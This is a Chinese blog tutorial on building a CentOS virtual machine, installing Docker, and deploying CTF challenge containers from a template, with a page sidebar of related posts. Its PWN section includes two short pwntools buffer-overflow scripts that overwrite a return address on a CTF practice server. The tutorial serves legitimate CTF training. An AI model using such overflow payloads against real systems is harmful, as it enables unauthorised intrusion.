从零开始部署CTF题目环境(docker容器)

已于 2023-12-30 17:03:13 修改
阅读量1.9k 收藏 30
点赞数 20
分类专栏: CTF 文章标签: docker 容器 CTF CTF-容器镜像搭建 CTF镜像文件 CTF镜像 Docker与CTF
于 2023-12-29 21:56:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuwoxinanA3/article/details/135208774
版权

本教程将教会大家如何安装一台可以部署docker容器形式的CTF题目的CentOS服务器。

操作步骤

1-下载操作系统镜像文件

虚拟操作系统:CentOS 8  (CentOS 9 毛病多,先不装)

镜像文件下载地址,点击X86_64即可

CentOS Stream

选一个下载快的,我选的清华 ,下那个12.2G的

下载得到

2-创建CentOS 虚拟机

VMware WorkStation点击创建新的虚拟机

选择典型即可

选择第二项,并指定你下载好的镜像文件

指定一下虚拟机名称,存放位置也改一下

50GB(只是后期不想扩容,20GB也行)

 自定义硬件,按照自己配置来,内存拿一半吧

自定义一下硬件,不然默认配置会很慢。内存取电脑一半,处理器1  内核4

第一次启动会有点久

3-安装CentOS 8系统

ctrl+alt+回车 切换全屏,选择简体中文!

配置Root密码

 密码为Rotten2023 ,点击完成

创建新用户centos

时间和区间设为上海

安装目的地点进去,然后退出来就行

没有报错,点击开始安装,时间可能会有点久

4-CentOS 换源

CentOS8 更改YUM源_centos8更换yum源-CSDN博客

换好后

yum update

5-安装docker

安装所需的软件包以允许 dnf 使用存储库通过 HTTPS 下载软件包:

sudo dnf install -y dnf-utils device-mapper-persistent-data lvm2

添加 Docker 存储库:

sudo dnf config-manager --add-repo=https://download.docker.com/linux/centos/docker-ce.repo

安装docker引擎

sudo dnf install -y --allowerasing docker-ce docker-ce-cli containerd.io


启动docker服务

sudo systemctl start docker

设置开机自启(可选)

sudo systemctl enable docker

验证安装情况

sudo docker run hello-world

本地没镜像,报错 ,可使用以下指令手动拉取(默认自动下载,但我这里卡住了,所以手动拉)

sudo docker pull hello-world

 OK了

6-docker换源

Docker安装及镜像源修改_更换docker镜像源-CSDN博客

如果发现那个nano编辑器用不来,可以看这个

CentOS下nano编辑器使用教程_centos 中noao 怎么用-CSDN博客

7-题目docekr部署 

借助巨魔的CTF靶机模板

GitHub - CTF-Archives/ctf-docker-template: Deployment template for docker target machine in ctf for CTFd and other platforms that support dynamic flags

先安装git,root用户

yum install git

 拉取项目

git clone 项目网址

PWN篇

取出一个模板,替换src中的二进制文件 

默认文件名为attachement,如需替换,需修改配置文件

替换好之后,这个目录下打开控制台

docker compose up -d

如果没设置IP, 或者忘了

查看容器列表

docker ps

 查看指定容器IP

docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' 1397af75dab3   #最后的是容器ID

就会自动构造image并运行docker容器,nc测试

注意,我用的是rip的题目文件,由于版本升级,可能wp要参考新版本的

旧版本无法打通

from pwn import * 

p=remote('node4.buuoj.cn',27036)

payload=b'a'*(15)  + p64(0x401186)

p.sendline(payload)

p.interactive()

加了中堆栈平衡的题解

from pwn import * 

#context(os='linux', arch='amd64', log_level='debug')

p=remote('node4.buuoj.cn',29110)

payload=b'a'*(23) + p64(0x0401016)  + p64(0x401186)

#p.recvuntil("please input\n")

p.sendline(payload)

p.interactive()

这是2023年第三次尝试自己搭建pwn环境,前两次均以失败告终,这次,在诸位大佬和群友的帮助下,终于得以完成。博主太菜了,给大家带来了麻烦,希望这篇博客能帮助大家更好的上手题目环境的搭建。

 本次学习需要由衷感谢以下几位大佬的支持

CTF-Archives开发者-感谢大大们的模板

华为大佬-协助docker问题解决

身份信息隐藏

Rotten战队交流群群友-顶级pwn手-解决脚本问题

还有许多篇博客的编写者

祝愿CTF-Archives项目越做越好,加油!

予我心安A3
关注
  • 20
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
如何搭建ctf题目(在ubuntu上构建docker)
WRplayeR的博客
04-13 590
搭建docker复现ctf
ocean_ctf:开源CTF平台动态标记docker部署管理用户界面用Flask jinjia2模板+ jQuery bootstrap管理端由Flask提供API VUE + element的构建
03-10
海洋周转基金 一个动态标志练习靶场平台 去做 容器管理 题库管理 动态标志 作弊检测 公告通知 动态启动题库 题库隔离 公告通知 排行榜 快速部署 大屏展示 权限分离 修正错误 修正错误 修正错误 预览 线上地址管理后台访客账号test / test 默认超级管理员账号superuser / admin 安装 docker方式 docker编排会引用.env文件中的环境变量 初始环境 dockerdocker-compose、git 克隆 git clone https://github.com/tongchengbin/ocean_ctf.git 编译web环境 docker build -t ocean_web -f install/docker/ocean_web.Dockerfile . 撰写编排 docker-compose up 访问测试 curl 127.0.0.1:
GZCTF平台搭建(一遍过)
m0_74426634的博客
06-11 449
最近招了一些新人,搭个训练平台折磨折磨他们😎
CTF(Capture The Flag )环境搭建
怡红群芳的博客
03-24 3066
CTFd是目前最流行的开源CTF框架之一,是一个有Python开发的框架,侧重于易用性和可定制性。它提供了运行CTF题目所需要的一切条件,并可使用插件和主题轻松进行自定义。
从0-1的CTF比赛环境搭建过程
weixin_62257805的博客
08-17 3000
博主已经对CTFd v3.3.1官方源码进行了更换国内镜像源、添加CTFd-Whale子模块、配置frp网络、设置静态文件CDN加速等工作,可前往使用作者修改的版本进行安装部署。使用Xshll连接进行操作(根据个人习惯选择)此次仅记录了搭建成功的大概过程,也是再N次失败后的一次小小复盘,其中有很多过程在不同机器和系统版本中可能出现报错,其解决方法自行百度或科学上网查找。有时间会更新本地虚拟机详细搭建过程。............
CTF靶场搭建及Web赛题制作与终端docker环境部署
Welcome To Myon'Blog !
11-22 6001
这种情况意思是docker需要我们指定下载镜像的版本号。哈喽大家好!我是Myon,趁着我的云服务器还没过期,这次给大家出一期很详细的CTF比赛的靶场搭建以及关于Web赛题的制作与docker环境部署教程,由于本人能力有限,也只能给大家讲一些基础简单的东西,欢迎大家在评论区互相交流学习,希望通过这篇博客大家能学到一些新东西,也期待大家的关注和支持!
从零开始搭建Ubuntu CTF-pwn环境
CoLin的pwn小屋
06-12 1万+
ctf pwn环境搭建(持续更新)
spindra:用于CTFDocker容器
02-26
用于CTFDocker容器 sudo docker run -it --rm \ -e DISPLAY=$DISPLAY \ -v /tmp/.X11-unix:/tmp/.X11-unix \ -v $HOME/spindra:/data \ --cap-add NET_ADMIN \ # Not required but useful --cap-add SYS_...
ctfhub:一些用于CTF环境Docker
05-14
CTFhub — 基于DockerCTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
CTF和AWD比赛使用的题目docker环境.zip
09-30
比赛项目源码
Elieen:使用JSON配置CTF-Pwn中的Docker容器.zip
最新发布
06-19
docker_info:docker相关信息 os:docker操作系统相关,一般为发行版 release:操作系统发布版本 version:版本号 flag:原始flag字符串,在setting.py中会自动计算md5值 expose:外界连接的端口 xinetd_config:...
pwndocker:创建一个轻量级的Docker容器来解决CTF挑战
04-03
创建一个轻量级的Docker容器来解决CTF挑战 设置 git clone https://github.com/Green-Avocado/pwndocker.git cd pwndocker sudo ./setup.sh 不要以超级用户身份运行安装程序。 用法: 从您的工作目录运行sudo ...
手把手教你打造CTF动态靶场
Python栈
07-03 3955
公司想搞一个CTF比赛,需要一个竞赛靶场,于是这个任务就落在了我的身上,平台是利用CTFd框架,基于docker搭建的动态靶场,搭建过程中遇到的坑比较多,这里我会把每一个遇到的坑都指出来。我搭建的是CTFd的3.X的版本。第一次搭建的话,搭建的过程会有些痛苦,但是搭建完成后会越来越熟练,这个平台的可用性还是很高的。由于搭建的过程中遇到的坑太多了,各种各样的问题,所以决定写下这篇文章,把所有的坑都指出来,也算为后边想搭这个平台的小伙伴指一条路。Taps:资源来源:星海安全实验室如果你也对网络安全&黑客。
CTF-web 常用软件安装及环境搭建
个人博客:https://www.mrzry.top
03-07 1万+
标签:CTF, web安全, 软件安装, 环境搭建, Typora, phpStudy, python, Sublime Text, AntSword, JDK1.8, Burp Suite
CTF-PWN环境搭建手册
yuwoxinanA3的博客
11-17 2077
CTF-PWN方向必备解题环境
(2024.3.6再度更新最新)一篇文章教你ctfd平台搭建&ctfd动态靶机创建&docker的使用&ctf动态flag的实现 来我这就够了!
zwy3327078581的博客
11-20 6225
ctfd 的平台搭建,维护,以及docker的使用创建下载安装,ctfd动态靶机的搭建题目部署题目出题模板格式等等····
CTF 三大测试靶场搭建:DVWA、SQLi-LABS、upload-labs 靶场部署教程(VM + CentOS 7 + Docker
zatongtong的博客
01-18 2061
基于 CentOS 7 系统,利用 Docker 部署 DVWA、SQLi-LABS、upload-labs 靶场,靶场的初始化,Docker 基本使用
docker搭建简单的ctf题目
网络安全。
12-07 1万+
0x01 docker常用命令 1.拉取镜像docker pull [image] 2.查看docker当前镜像docker image ls 或 docker images 3.新建一个docker容器,并映射端口号。 docker run -d -p [host port]:[docker port] [image] 4.查看运行中的docker容器docker ps...
Docker搭建环境部署Ctf题目(过程及问题解决)
热门推荐
Love&Share
09-14 1万+
Docker部署Ctf题目(过程及问题解决) 1.Docker基础 什么是Docker Docker 是一个开源的应用容器引擎,基于Go 语言并遵从 Apache2.0 协议开源。 Docker 可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。 容器是完全使用沙箱机制,相互之间不会有任何接口(类似 iPhone 的 app),更重要的是容器性能开销极低。 Docker 从 17.03 版本之后分为 CE(Community Ed
ctfweb题目docker镜像
11-26
ctfweb题目"docker镜像"是指一个挑战题目,要求我们对一个Docker镜像进行分析和攻击。Docker是一种容器化技术,可以将应用、环境和关联的配置打包成一个独立的镜像。这个镜像可以在不同的环境中进行移植和运行。 对于这个ctfweb题目,我们可以首先通过命令"docker images"查看当前系统中的Docker镜像。然后,我们可以选择这个题目中的特定镜像进行分析,使用"docker inspect [镜像ID]"命令获取有关镜像的详细信息。 接下来,我们可以尝试在本地使用这个镜像来运行一个容器。可以使用"docker run [镜像ID]"命令创建一个新的容器实例,并根据题目给出的提示找出容器内的漏洞、文件、服务等信息。 从容器内部提取敏感信息的常见方法包括查找配置文件、访问数据库、分析日志文件等。另外,在容器中也可以进行一些命令执行、代码注入等漏洞利用操作,以获取更高的权限和更深入的信息。 此外,我们还可以使用一些常见的Docker安全工具,比如Docker Bench for Security、Clair、Trivy等来对容器进行漏洞扫描,识别潜在的安全问题,并找出可能存在的弱点。 当我们找到容器内的漏洞或弱点时,我们可以根据具体情况进行利用或编写脚本进行自动化攻击。在攻击过程中,我们应该遵循道德规范,不进行未授权的攻击行为。 总之,ctfweb题目"docker镜像"需要我们对Docker容器进行分析和攻击,通过理解镜像的构成和原理,掌握Docker相关的命令以及使用一些安全工具,我们可以更好地解决这个题目并获得相应的分数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

予我心安A3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值